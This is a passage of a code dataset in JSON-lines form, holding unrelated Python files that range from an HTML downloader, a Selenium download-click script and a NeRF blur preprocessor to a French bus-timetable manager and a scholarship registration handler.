file is tagged by a tag.\"\"\"\n        if tag_name not in self.tags:\n            # if the tag doesn't exist, no path can be tagged by it.\n            return False\n        tag = self.tags.get(tag_name)\n        hashstring = self.files.get(path)\n        return hashstring in tag\n\n    def tags_of_file(self, path):\n        \"\"\"Return the names of all tags which are tagging a file.\"\"\"\n        hashstring = self.files.get(path)\n        return funcset(tag_name\n                       for tag_name, tag in self.tags.items()\n                       if hashstring in tag)\n","sub_path":"ilp/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"91336256","text":"import urllib.request\n\n# Define a function that rips the HTML from a target domain and writes it to a file\n\ndef html_rip(targeturl, filepath):\n    with urllib.request.urlopen(targeturl) as response:\n        html = str(response.read())\n    # a context manager guarantees the file is closed; the original called\n    # tempfile.close without parentheses, so the file was never closed\n    with open(filepath, \"w\") as outfile:\n        outfile.write(html)\n\n\n# Specify the target domain\n\nhtml_rip(input(\"What's the complete url of the target? \"), input(\"What's the absolute path of the filepath you want to create? \"))\n","sub_path":"network-survival-tool-master/ClientBrowser.py","file_name":"ClientBrowser.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"183593803","text":"import os\nimport pyperclip\n\npyperclip.copy('Err')\ntabs = 0\ntabPath = \"\"\ntabsmod = 0\ntabsPlus = 0\nrootDir = \"D:/\"\nsaveFile = r\"C:\\Users\\Sharvin\\Desktop\"\nmasterFilePath = os.path.join(saveFile, '__myList.txt')\nwith open(masterFilePath, 'w', encoding='utf-8') as f:\n    for dirpaths, dirnames, filenames in os.walk(rootDir):\n\n        _, root = os.path.split(dirpaths)\n\n        if root == \"\":\n            tabs = 0\n        else:\n            # strip the walk root so nesting depth is counted relative to rootDir\n            # (the original stripped the hard-coded drive 'E:/' instead of 'D:/')\n            tabPath = dirpaths.replace(rootDir, '')\n            tabs = len(tabPath.split('\\\\'))\n            tabsmod = tabs - 1\n            tabsPlus = tabsmod + 1\n\n        if tabsmod == 0:\n            f.write('\\n')\n\n        f.write('\\t' * tabsmod + root + '\\n')\n\n        if tabs == 0 and root == \"\":\n            for file in filenames:\n                f.write('\\t' * tabs + file + '\\n')\n        else:\n            for file in filenames:\n                f.write('\\t' * tabsPlus + file + '\\n')\n\nwith open(masterFilePath, 'r', encoding='utf-8') as f:\n    copiedText = f.read()\n    pyperclip.copy(copiedText)\n\nprint('='.center(40, '='))\nprint('COMPLETED'.center(40, '='))\nprint('='.center(40, '='))","sub_path":"ListFolderContent_MODIFIED_append_to_file_in_desktop.py","file_name":"ListFolderContent_MODIFIED_append_to_file_in_desktop.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353194300","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@File : selenium_test.py\n@Author: Eveline Xue\n@Date : 2019/4/28 13:50\n@Desc : use the selenium automation tool to simulate browser clicks\n'''\nimport random\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom referer_proxy import dynamic_load\nfrom utils.useragents import useragent\n\nEXECUTE_PATH = r'E:\\Codes\\xuecode\\handsomeboy\\chromeDriver\\chromedriver74.exe'\n\n\n# 90\ndef search(query_url):\n    browser, wait = dynamic_load()\n    browser.get(query_url)\n    browser.implicitly_wait(10)\n    try:\n        wait.until(\n            EC.presence_of_all_elements_located((By.LINK_TEXT, '普通下载'))\n        )\n        submit = 
wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"go\"]/a[4]/span')))\n except:\n submit = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"tt_6\"]/a[1]')))\n submit.click()\n time.sleep(20)\n print('click over')\n # url = 'https://httpbin.org/headers'\n # browser.execute_script('window.location.href = \"{}\";'.format(url))\n # wait.until(lambda driver: driver.current_url == url)\n # # print(browser.page_source)\n browser.quit()\n\n\ndef get_exploer():\n # 加表头\n options = webdriver.ChromeOptions()\n options.add_argument(\n 'user-agent={}'.format(random.choice(useragent)))\n browser = webdriver.Chrome(executable_path=EXECUTE_PATH, options=options)\n wait = WebDriverWait(browser, 10)\n return browser, wait\n\n\ndef main():\n search('http://www.90pan.com/b1173540')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"595153280","text":"import inspect\nfrom flask import abort\n\n\n__all__ = ['validate']\n\n\ndef validate(*__validators__):\n for __validator__ in __validators__:\n if not inspect.isclass(__validator__):\n raise TypeError('The validate decorator only accepts class.')\n method = getattr(__validator__, 'validate', None)\n if method is None or not callable(method):\n raise AttributeError('The validator should contains a callable method \"validate(self)\"')\n\n def decorator(func):\n\n def func_wrapper(*args, **kwargs):\n for __validator__ in __validators__:\n if not __validator__().validate():\n abort(400)\n return func(*args, **kwargs)\n\n return func_wrapper\n\n return decorator\n","sub_path":"flask_validate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621690059","text":"import sys\n\ndef main():\n\tfor line in sys.stdin:\n\t\t\n\t\tinput = [int(num) for num in line.split()]\n\t\t\n\t\ta=input[0]\n\t\tb=input[1]\n\t\tc=input[2]\n\t\t\n\t\tdiscriminant = getDiscriminant(a, b, c)\n\t\tif discriminant < 0:\n\t\t\tprint (\"None\")\n\t\t\tcontinue\n\t\t\n\t\troots = []\n\t\troots.append(((-b)+((discriminant)**0.5))/(2*a))\n\t\troots.append(((-b)-((discriminant)**0.5))/(2*a))\n\t\t\n\t\tprint (\"r1 = {}, r2 = {}\".format(roots[0], roots[1]))\n\t\t\t\ndef getDiscriminant(a, b, c):\n\treturn (b**2) - (4*a*c)\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"62/roots_62.py","file_name":"roots_62.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"548064377","text":"from numpy import *\nfrom time import time\n# 二乗誤差 (a : 真の行列, b : 近似行列)\ndef difcost(a,b):\n\tdif = 0\n\tfor i in range(shape(a)[0]):\n\t\tfor j in range(shape(a)[1]):\n\t\t\tdif += pow(a[i,j]-b[i,j],2)\n\treturn dif\n\n# v : 分解対象の行列 , pc : 特徴の数 , iter : 実行回数\ndef factorize(v,pc=10,t = 20,eps=1e-12):\n\tic = shape(v)[0] # 重み行列の行数(データ項目数)\n\tfc = shape(v)[1] # 特徴行列の列数(特徴項目数)\n\n\t#初期化\n\tw = matrix([[random.random() for i in range(pc)] for j in range(ic)]) \n\th = matrix([[random.random() for i in range(fc)] for j in range(pc)])\n\n\tstart = time()\n\twhile True:\n\t\twh = w*h\n\t\tcost = difcost(v,wh)\n\t\t#print(cost)\n\t\tnow = time()\n\t\tif (now - start) > t or cost < eps:\n\t\t\tbreak\n\t\t# 特徴行列の更新\n\t\thn = (transpose(w)*v)\n\t\thd = (transpose(w)*w*h)\n\t\th = 
matrix(array(h)*array(hn)/array(hd))\n\n\t\t# update the weight matrix\n\t\twn = (v*transpose(h))\n\t\twd = (w*h*transpose(h))\n\n\t\tw = matrix(array(w)*array(wn)/array(wd))\n\n\treturn w,h\n\n# test run\n\n\n\n\n\n\n","sub_path":"nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"620662464","text":"import sys\nsys.path.append('.')\n\nimport os\nimport argparse\nimport math\nimport numpy as np\nfrom skimage import io, filters, util\nimport json\nfrom tqdm import tqdm\nfrom util import interpolate\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Applies blur with random sigma to images and saves the amount to pose file.')\n    parser.add_argument('path_in', help='Path to NeRF dataset.')\n    parser.add_argument('path_out', help='Path to save to.')\n    parser.add_argument('--subsets', nargs='+', default=['train'], help='Subsets to process.')\n    parser.add_argument('--max_sigma', type=float, default=0, help='Max sigma value.')\n    parser.add_argument('--dataset_size_increase', type=int, default=1, help='Integer factor by which to increase the dataset.')\n    parser.add_argument('--p', type=float, default=3, help='Exponent steering the sigma distribution.')\n    args = parser.parse_args()\n\n    # Create output dir\n    os.makedirs(args.path_out)\n\n    # Loop over images\n    for subset in args.subsets:\n        print('Processing {} subset.'.format(subset))\n\n        # Get image filenames\n        imgs_path = os.path.join(args.path_in, subset)\n        img_names = sorted(os.listdir(imgs_path))\n        n_imgs = len(img_names)\n        n_imgs_out = n_imgs * args.dataset_size_increase\n\n        # Get pose file path\n        path_pose = os.path.join(args.path_in, 'transforms_' + subset + '.json')\n        with open(path_pose) as pose_file:\n            pose_dict = json.load(pose_file)\n\n        # Get image output file path\n        path_out_subset = os.path.join(args.path_out, subset)\n        os.makedirs(path_out_subset)\n\n        # Inverse cdf of exponential distribution for sampling\n        def inv_cdf(x, p):\n            if -1e-4 < p and p < 1e-4:\n                return x\n            else:\n                return -np.log(1 - x * (1 - np.exp(-p))) / p\n\n        # Sample random sigma values\n        np.random.seed(0)\n        # use the exponent supplied on the command line; it was previously\n        # shadowed by a hard-coded p = 3, which made the --p flag a no-op\n        p = args.p\n        samples = inv_cdf(np.random.rand(n_imgs_out), p)\n        sigma = (samples * args.max_sigma).tolist()\n\n        # Get format string for image names\n        min_chars = math.ceil(np.log10(n_imgs_out))\n        format_str = '{:0' + str(min_chars) + 'd}'\n\n        # Define the per-image blur operation\n        def blur_img(inp):\n            idx, img_name, sigma = inp\n            format = os.path.splitext(img_name)[-1]\n\n            if format == '.png':\n                # Load image\n                img = io.imread(os.path.join(imgs_path, img_name))\n                img = util.img_as_float(img)\n                img[:,:,:3] = (img[:,:,:3] ** 2.2 * (img[:,:,3:]))\n                img = filters.gaussian(img, sigma=sigma, mode='constant', multichannel=True)\n                img[:,:,:3] = (img[:,:,:3] / (img[:,:,3:] + 1e-5)) ** (1 / 2.2)\n\n                # Save image\n                img_prefix = img_name.split('_')[0]\n                img_name_out = img_prefix + '_' + format_str.format(idx) + '.png'\n\n                io.imsave(os.path.join(path_out_subset, img_name_out), util.img_as_ubyte(np.clip(img,0,1)), check_contrast=False)\n            elif format == '.exr':\n                import pyexr as exr\n\n                # Load image\n                img = exr.read(os.path.join(imgs_path, img_name))\n\n                # Apply blur\n                img = interpolate.filtered_downsample(img, 1, sigma).numpy()\n\n                # Save image\n                img_prefix = img_name.split('_')[0]\n                img_name_out = img_prefix + '_' + format_str.format(idx) + '.exr'\n\n                exr.write(os.path.join(path_out_subset, img_name_out), img)\n            else:\n                raise ValueError('Unknown filetype.')\n\n        with 
tqdm(total=n_imgs_out) as pbar:\n for inp in zip(range(n_imgs_out), img_names * args.dataset_size_increase, sigma):\n blur_img(inp)\n pbar.update()\n\n # Get output pose dict\n pose_dict_out = {}\n pose_dict_out.update({'camera_angle_x': pose_dict['camera_angle_x'], 'frames': []})\n\n # Add sigma values to pose dict\n for i in range(n_imgs_out):\n pose_dict_out['frames'].append(dict(pose_dict['frames'][i % n_imgs]))\n\n img_path = pose_dict_out['frames'][i]['file_path'].split('_')[0]\n img_path_out = img_path + '_' + format_str.format(i)\n pose_dict_out['frames'][i]['file_path'] = img_path_out\n\n updated_parameters = {'Blur': sigma[i]}\n updated_parameters.update(pose_dict_out['frames'][i]['driver_parameters'])\n pose_dict_out['frames'][i]['driver_parameters'] = updated_parameters\n\n # Save pose dict to new location\n path_out_pose = os.path.join(args.path_out, 'transforms_' + subset + '.json')\n with open(path_out_pose, 'w+') as pose_file:\n json.dump(pose_dict_out, pose_file, sort_keys=False, indent=4)","sub_path":"data/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246801716","text":"#! /usr/bin/python\n# -*- coding:utf-8 -*-\n'''\nPour utiliser le gestionnaire décommentez les lignes de test\nrepéré avec #ligne de test\n'''\n\nimport os\nimport Data, time, random\nfrom time import localtime, strftime\nfrom datetime import datetime\n\nclass Ligne(object):\n '''Objet contenant une ligne qui sera instancier plusieurs fois'''\n def __init__(self, ligne):\n self.num_ligne = ligne\n self.villes_aller = self.init_ville(self.num_ligne, 'aller')\n self.villes_retour = self.init_ville(self.num_ligne, 'retour')\n self.aller = Data.lignes[ligne]['aller']\n self.retour = Data.lignes[ligne]['retour']\n self.ligne = Data.lignes[ligne]\n\n def init_ville(self, num_ligne, Sens):\n '''Initialise la liste des villes'''\n villes = []\n periode = ['scol', 'vac_ete', 'autres_vac']\n\n for sens in Data.lignes[num_ligne]:\n if sens == Sens:\n for row in Data.lignes[num_ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes and row[i][0] not in periode:\n villes.append(row[i][0])\n\n return villes\n\nclass Insert(object):\n '''Objet d'insertion dans la BD'''\n def __init__(self):\n self.dossier = os.listdir('sources')\n\n def lecture_fichier(self, path):\n '''Lit un csv ou un txt et le renvoi sous forme de tableau.'''\n \"\"\"Ouvre et lit un fichier\"\"\"\n with open(path, 'r') as fichier:\n read_fichier = fichier.read()\n\n tab_fichier = []\n saut_de_ligne = True\n\n \"\"\"Insert le contenue du fichier dans tableau Séparateur: saut de ligne\"\"\"\n while saut_de_ligne:\n if '\\n' in read_fichier:\n index = read_fichier.index('\\n')\n tab_fichier.append([read_fichier[:index]])\n read_fichier = read_fichier[index+1:]\n else:\n saut_de_ligne = False\n\n \"\"\"Découpe chaque ligne du tableau. 
Séparateur: ; \"\"\"\n for j in range(len(tab_fichier)):\n ligne_tab = ';'.join(tab_fichier[j])\n ligne_tab = ligne_tab.split(';')\n tab_fichier[j] = ligne_tab\n\n return tab_fichier\n\n def suppr_inutile(self, tableau):\n '''Supprime les colonnes inutile (contenant ND)'''\n index = None\n IsND = True\n while IsND:\n if 'ND' not in tableau[0]:\n IsND = False\n break\n for row in tableau:\n if len(row) == len(tableau[0]) and len(row) <= 8:\n break\n if row == tableau[0] and 'ND' in row:\n index = tableau[0].index('ND')\n tableau[0].pop(index)\n else:\n row.pop(index)\n return tableau\n\n def inscription(self, lignes, dico_lignes):\n '''Inscrit les données dans la BD'''\n nonInscrit = True\n while nonInscrit:\n try:\n with open('Data.py', 'a') as bd:\n bd.write(lignes)\n bd.write(dico_lignes)\n nonInscrit = False\n except NameError:\n print('Echec de lecture du fichier : '+NameError)\n continue\n\n def insert(self):\n '''Insert les données du dossier \"sources\" dans la BD'''\n lignes = []\n dico_lignes = [\"lignes = {\\n\"]\n\n \"\"\"Liste les sous dossier de /sources\"\"\"\n for i in range(len(self.dossier)):\n paths = []\n path_dossier = 'sources/' + self.dossier[i]\n fichier = os.listdir(path_dossier)\n\n \"\"\"Liste les fichiers contenus dans chaque sous dossier\"\"\"\n for j in range(len(fichier)):\n path_fichier = path_dossier + '/' + fichier[j]\n paths.append(path_fichier)\n\n dico_bd = []\n for path in paths:\n '''\n Créer de trois tableaux pour chaque \"catégories\"\n scol = periode scolaire...\n '''\n fichier = self.lecture_fichier(path)\n\n scol = [fichier[1]] + fichier[4:]\n scol = self.suppr_inutile(scol)\n\n fichier = self.lecture_fichier(path)\n\n vac_ete = [fichier[2]] + fichier[4:]\n vac_ete = self.suppr_inutile(vac_ete)\n\n fichier = self.lecture_fichier(path)\n\n autre_vac = [fichier[3]] + fichier[4:]\n autre_vac = self.suppr_inutile(autre_vac)\n\n if dico_bd == []:\n dico_bd.append(fichier[0][0])\n dico_bd.append(fichier[0][1])\n dico_bd.append(fichier[0][2])\n\n else:\n dico_bd.append(fichier[0][2])\n\n '''inscrit les tableaux dans une var'''\n lignes.append(fichier[0][2]+' = [\\n'+str(scol)+',\\n'+str(autre_vac)+',\\n'+str(vac_ete)+']\\n')\n\n if i == len(self.dossier)-1:\n dico_lignes.append(\" '\"+dico_bd[1]+\"': {'aller': \"+dico_bd[2]+\", 'retour': \"+dico_bd[3]+\"}\\n}\")\n else:\n dico_lignes.append(\" '\"+dico_bd[1]+\"': {'aller': \"+dico_bd[2]+\", 'retour': \"+dico_bd[3]+\"},\\n\")\n lignes = ''.join(lignes)\n dico_lignes = ''.join(dico_lignes)\n self.inscription(lignes, dico_lignes)\n\nclass Temps(object):\n '''Objet de gestion de la date et de l'heure '''\n def __init__(self):\n self.date = self.init_date()\n self.heure = self.init_heure()\n self.numJourAn = self.init_numjouran()\n self.numJourSem = self.init_numjoursem()\n self.jour_feries = ['15/8/2015','1/11/2015','11/11/2015','25/12/2015','1/1/2016','28/3/2016','1/5/2016','5/5/2016','16/5/2016','14/7/2016']\n self.jour = self.init_jour()\n self.vacances = {'vac_ete': ['5/07/2015', '1/09/2015'], 'toussaint': ['17/10/2015', '2/11/2015'], 'noel': ['19/12/2015', '4/01/2016'], 'hiver': ['13/02/2016', '29/02/2016'], 'printemps': ['9/04/2016', '25/04/2016']}\n self.periode = self.init_periode()\n\n def init_date(self):\n '''Mise en forme de la date'''\n objet_date = datetime.now()\n if len(str(objet_date.month)) == 1:\n mois = '0' + str(objet_date.month)\n else:\n mois = str(objet_date.month)\n date = str(objet_date.day)+'/'+mois+'/'+str(objet_date.year)\n return date\n\n def init_heure(self):\n 
'''Initialisation de l'heure'''\n heure = strftime(\"%H:%M\", localtime())\n heure = heure.split(':')\n heure = int(str(heure[0])+str(heure[1]))\n return heure\n\n def init_numjouran(self):\n '''Donne le numéro du jour dans l'année'''\n date = self.date.split('/')\n jour, mois, annee = date\n jour, mois, annee = int(jour), int(mois), int(annee)\n if ((annee % 4 == 0 and annee % 100 != 0) or annee % 400 == 0): # bissextile?\n return (0,31,60,91,121,152,182,213,244,274,305,335,366)[mois-1] + jour\n else:\n return (0,31,59,90,120,151,181,212,243,273,304,334,365)[mois-1] + jour\n\n def init_numjoursem(self):\n '''Donne le numéro du jour de la semaine'''\n date = self.date.split('/')\n annee = int(date[2])-1\n jour = (annee+(annee//4)-(annee//100)+(annee//400)+self.numJourAn) % 7\n if jour == 0: jour = 7\n return jour\n\n def init_jour(self):\n if self.date in self.jour_feries:\n return 'Ferie'\n return ['Lundi', 'Mardi', 'mercredi', 'Jeudi', 'Vendredi', 'Samedi', 'Dimanche'][self.numJourSem-1]\n\n def date_anterieur(self, premiere_date, seconde_date):\n '''Dit si une premiere date est antèrieure ou égale à une seconde date'''\n premiere_date = premiere_date.split('/')\n seconde_date = seconde_date.split('/')\n if premiere_date == seconde_date:\n return 'identique'\n else:\n if int(seconde_date[2]) > int(premiere_date[2]):\n return True\n elif int(seconde_date[2]) == int(premiere_date[2]):\n if int(seconde_date[1]) > int(premiere_date[1]):\n return True\n elif int(seconde_date[1]) == int(premiere_date[1]):\n if int(seconde_date[0]) >= int(premiere_date[0]):\n return True\n return False\n\n def date_posterieur(self, premiere_date, seconde_date):\n '''Dit si une premiere date est postérieure ou égale à une seconde date'''\n premiere_date = premiere_date.split('/')\n seconde_date = seconde_date.split('/')\n if premiere_date == seconde_date:\n return 'identique'\n else:\n if int(seconde_date[2]) < int(premiere_date[2]):\n return True\n elif int(seconde_date[2]) == int(premiere_date[2]):\n if int(seconde_date[1]) < int(premiere_date[1]):\n return True\n elif int(seconde_date[1]) == int(premiere_date[1]):\n if int(seconde_date[0]) <= int(premiere_date[0]):\n return True\n return False\n\n def init_periode(self):\n '''Initialise la période de l'année'''\n for vacance in self.vacances:\n posterieur = self.date_posterieur(self.date, self.vacances[vacance][0])\n anterieur = self.date_anterieur(self.date, self.vacances[vacance][1])\n\n if posterieur == True and anterieur == True:\n if vacance == 'vac_ete':\n retour = 2\n break\n else:\n retour = 1\n break\n elif posterieur == False or anterieur == False:\n retour = 0\n return retour\n\nclass Select(object):\n ''''Objet selection des horaires'''\n def __init__(self, ville_depart, arret_depart, ville_arriver, arret_arriver):\n self.lignes = self.init_lignes()\n self.ville_depart = ville_depart\n self.arret_depart = arret_depart\n self.ville_arriver = ville_arriver\n self.arret_arriver = arret_arriver\n self.date = Temps()\n self.num_ligne = self.init_num_ligne()\n self.sens = self.init_sens()\n self.fiche = self.init_fiche()\n self.index_jour =self.init_index_jour()\n self.index_heure = None\n self.depart, self.arriver = self.init_depart_arriver()\n self.depart = self.select_arret(self.depart)\n self.arriver = self.select_arret(self.arriver)\n self.depart = self.select_horaire(self.depart)\n self.arriver = self.select_horaire(self.arriver)\n self.retour = self.mise_en_forme(self.depart, self.arriver)\n\n def init_lignes(self):\n '''Initialise le 
dictionnaire contenant les objets ligne'''\n lignes = {}\n for num_ligne in Data.lignes:\n lignes[str(num_ligne)] = Ligne(num_ligne)\n return lignes\n\n def init_num_ligne(self):\n '''Détermine le numéro de la ligne'''\n for ligne in self.lignes:\n if self.ville_depart in self.lignes[ligne].villes_aller and self.ville_arriver in self.lignes[ligne].villes_aller:\n return ligne\n\n def init_sens(self):\n '''Détermine le sens grace à la position des villes dans la liste'''\n if self.lignes[self.num_ligne].villes_aller.index(self.ville_depart) < self.lignes[self.num_ligne].villes_aller.index(self.ville_arriver):\n return 'aller'\n else:\n return 'retour'\n\n def init_fiche(self):\n '''Renvoi la fiche voule grace au sens'''\n if self.sens == 'aller': return self.lignes[self.num_ligne].aller[self.date.periode]\n elif self.sens == 'retour': return self.lignes[self.num_ligne].retour[self.date.periode]\n\n def init_index_jour(self):\n '''Détermine l'index des colonnes voulue (jour) pour selectionner les bons horaires'''\n index_jour = []\n aujourdhui = self.date.jour\n aujourdhui = aujourdhui[0]\n for jour in self.fiche[0]:\n if jour != self.fiche[0][0] and jour != self.fiche[0][1]:\n if aujourdhui in jour:\n index_jour.append(self.fiche[0].index(jour))\n index_jour.reverse()\n index_jour.append(1)\n index_jour.append(0)\n index_jour.reverse()\n return index_jour\n\n def init_depart_arriver(self):\n '''Sélectionne les lignes contenant les villes de depart et d'arriver'''\n depart = []\n arriver = []\n for horaire in self.fiche:\n buffer_depart = []\n buffer_arriver = []\n if horaire[0] == self.ville_depart:\n if horaire[:3] == ['LE CHEYLARD', 'Collège St Louis', '0']:continue\n for index in self.index_jour:\n buffer_depart.append(horaire[index])\n elif horaire[0] == self.ville_arriver:\n for index in self.index_jour:\n buffer_arriver.append(horaire[index])\n if buffer_arriver != []:\n arriver.append(buffer_arriver)\n if buffer_depart != []:\n depart.append(buffer_depart)\n self.index_heure = self.init_index_heure(depart)\n return depart, arriver\n\n def init_index_heure(self, depart):\n '''Détermine l'index des colonnes voulue (heure) pour selectionner les bons horaires'''\n index_heure = []\n for DepArr in depart:\n if depart.index(DepArr) == 1: break\n for heure in DepArr:\n print(heure)\n try:\n decoupe = heure.split(':')\n decoupe = int(str(decoupe[0])+str(decoupe[1]))\n if decoupe > self.date.heure:\n if str(DepArr.index(heure)) not in index_heure:\n index_heure.append(DepArr.index(heure))\n except:\n index_heure.append(DepArr.index(heure))\n return index_heure\n\n def select_arret(self, ligne):\n if ligne[0][0] == self.ville_depart:\n tab_retour = []\n for arret in ligne:\n if self.arret_depart == arret[1]:\n tab_retour = arret\n break\n else:\n continue\n return tab_retour\n else:\n tab_retour = []\n for arret in ligne:\n if self.arret_arriver == arret[1]:\n tab_retour = arret\n else:\n continue\n return tab_retour\n\n def select_horaire(self, arret):\n '''Renvoi la ville, l'arret et les horaire en fonction des index des heures voulue'''\n tab_retour = []\n for heure in arret:\n if arret.index(heure) in self.index_heure:\n tab_retour.append(heure)\n else:\n continue\n return tab_retour\n\n def mise_en_forme(self, depart, arriver):\n '''Met en forme le dictionnaire de retour'''\n dico_retour = {}\n '''Met en forme le départ'''\n dico_retour[self.ville_depart] = {}\n depart = depart[1:]\n for i in range(len(depart)):\n if i == 0:continue\n dico_retour[self.ville_depart]['bus'+str(i)] = 
[depart[0], depart[i]]\n\n '''Met en forme l'arriver'''\n dico_retour[self.ville_arriver] = {}\n arriver = arriver[1:]\n for i in range(len(arriver)):\n if i == 0:continue\n dico_retour[self.ville_arriver]['bus'+str(i)] = [arriver[0], arriver[i]]\n\n return dico_retour\n\n################################################\n'''Section fonctions app'''\n\ndef select_villes(lettre_choisi):\n '''Recupère la liste des villes et la renvoi sous forme de tableau'''\n villes_aller = []\n periode = ['scol', 'vac_ete', 'autres_vac']\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes_aller and row[i][0] not in periode:\n if row[i][0][0] == lettre_choisi:\n villes_aller.append(row[i][0])\n\n villes_aller.sort()\n return villes_aller\n\ndef select_arrets(ville_selectionne):\n periode = ['scol', 'vac_ete', 'autres_vac']\n arrets = []\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in arrets and row[i][0] not in periode:\n if row[i][0] == ville_selectionne and row[i][1] not in arrets:\n arrets.append(row[i][1])\n arrets_retour = arrets\n arrets_retour.sort()\n return arrets_retour\n\ndef select_seconde_villes(ville_selectionne, lettre_choisi):\n '''Recupère la liste des villes et la renvoi sous forme de tableau'''\n periode = ['scol', 'vac_ete', 'autres_vac']\n\n villes = []\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes and row[i][0] not in periode:\n if row[i][0][0] == lettre_choisi and row[i][0] != ville_selectionne:\n villes.append(row[i][0])\n villes_retour = villes\n villes_retour.sort()\n return villes_retour\n\ndef select_horaire(depart, arret_depart, arriver, arret_arriver):\n '''\n Le select général\n Les valeurs demandées sont sous cette forme:\n depart = 'LE CHEYLARD'\n arriver = 'CHARMES'\n '''\n if depart != None or arriver != None:\n selection = Select(depart, arret_depart, arriver, arret_arriver)\n return selection.retour\n else:\n return 'ERREUR'\n\n################################################\n\nif __name__ == '__main__':#lignes de test\n #print('1-select 2-insert')\n #choix = input()\n choix = '1'\n if choix == '1':\n print(select_horaire('LE CHEYLARD', 'Gendarmerie', 'CHARMES', 'Centre'))\n #test_select = Select('LE CHEYLARD', 'CHARMES')\n #for row in test_select.retour: print(row, test_select.retour[row])\n #for row in test_select.depart: print(row)\n #for row in test_select.arriver: print(row)\n\n #main()\n elif choix == '2':\n insertion = Insert()\n insertion.insert()","sub_path":".buildozer/android/app/gestion_bd.py","file_name":"gestion_bd.py","file_ext":"py","file_size_in_byte":18693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342787510","text":"class Solution:\n def numDistinct_simple(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n dp = [1] + [0] * (len(t))\n for c in s:\n for i in range(len(t) - 1, -1, -1):\n if c == t[i]:\n dp[i + 1] += dp[i]\n print(dp)\n return dp[-1]\n\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n n, m = len(s), len(t)\n dp = [[0] * (n+1) for _ in range(m+1)]\n dp[0][0] = 1\n # All i can create the empty target sequence, just skip 
everything\n for i in range(n+1):\n dp[0][i] = 1\n\n for i in range(1, m+1):\n for j in range(1, n+1):\n if s[j-1] != t[i-1]:\n dp[i][j] = dp[i][j-1]\n else:\n dp[i][j] = dp[i][j-1] + dp[i-1][j-1]\n print(dp[i])\n return dp[m][n]\n\nsol = Solution()\nprint(sol.numDistinct(\"rabbbit\", \"rabbit\"))\n# print(sol.numDistinct(\"rabbb\", \"rabb\"))\n","sub_path":"distinct_strs.py","file_name":"distinct_strs.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383906471","text":"import com.ihsan.foundation.pobjecthelper as phelper\nimport sys\n\ndef TampilNama(config, parameter, returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n ['NamaBeasiswa',''],\n ['PhoneNumber',''],\n ['alamat',''],\n ['kota',''],\n ['kodepos',''],\n )\n try:\n param = parameter.FirstRecord\n helper = phelper.PObjectHelper(config)\n\n oCust = helper.GetObject('Mustahiq', param.idmustahiq)\n oBeasiswa = helper.GetObject('Customer', oCust.CustomerId)\n\n status.NamaBeasiswa = oBeasiswa.CustomerName\n status.PhoneNumber = oBeasiswa.PhoneNumber\n status.alamat = oBeasiswa.AddressStreet\n status.kota = oBeasiswa.AddressCity\n status.kodepos = oBeasiswa.AddressPostalCode\n\n except:\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n raise\n\ndef Simpan(config, parameter, returns):\n status = returns.CreateValues(\n ['Is_Err',0],['Err_Message',''],['Pesan','']\n )\n recParam = parameter.FirstRecord\n helper = phelper.PObjectHelper(config)\n ProductId = recParam.ProductId\n config.BeginTransaction()\n param = {'tipe':'Beasiswa'}\n try:\n\n assProd = helper.CreatePObject('MustahiqProduct', param)\n assProd.ProductId = ProductId\n assProd.MustahiqId = recParam.GetFieldByName('LMustahiqProduct.MustahiqId')\n\n UpdateProduk = helper.GetObject('Product',ProductId )\n SisaQuota = UpdateProduk.CurrentQuotaPosition + 1\n UpdateProduk.CurrentQuotaPosition = SisaQuota\n if SisaQuota >= UpdateProduk.MustahiqQuota :\n UpdateProduk.IsQuotaFull = 'T'\n\n config.Commit()\n status.Pesan='Data Beasiswa Berhasil diregistrasi..'\n 